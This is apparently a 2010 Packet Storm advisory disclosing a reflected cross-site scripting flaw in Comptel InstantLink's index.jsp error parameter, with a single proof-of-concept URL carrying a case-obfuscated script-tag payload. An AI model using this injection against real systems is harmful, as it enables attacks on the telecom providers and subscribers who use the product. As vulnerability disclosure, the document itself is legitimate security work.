Comptel InstantLink Cross Site Scripting

2010-02-26T00:00:00
ID PACKETSTORM:86722
Type packetstorm
Reporter thebluegenius
Modified 2010-02-26T00:00:00

Description

                                        
                                            `--------------------------------------------------------------------  
# Exploit Title: Comptel InstantLink" XSS vulnerability  
# Date: 24 Feb 2010  
# Author: thebluegenius  
# Software Link: http://www.comptel.com/ProvisioningActivation/  
# Version: All  
# CVE : NA  
  
---------------------------------------------------  
"Comptel InstantLink" XSS vulnerability.  
---------------------------------------------------  
By :Thebluegenius.   
Email :rajsm@isac.org.in  
Blog :www.thebluegenius.com.  
---------------------------------------------------  
  
Product Name: Comptel Instant Link System  
Vendor :http://www.comptel.com/ProvisioningActivation/  
  
Description:  
  
Comptel InstantLink automates the user provisioning and service activation processes. It covers the entire provisioning workflow - from order entry to billable service.  
  
The product suffers from XSS vulnerability. Presently this product is deployed to over 280 Telecom customers with 800+ million subscribers across the world.  
  
------------------  
Vulnerability: XSS  
------------------  
you can execute XSS as given below:  
http://IPaddress:port/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E  
  
-----------------------------------------------------  
Greetz Fly Out to:  
1] Amforked() : My good friend  
2] Aodrulez : for inspiring me  
3] www.OrchidSeven.com  
4] www.isac.org.in  
  
`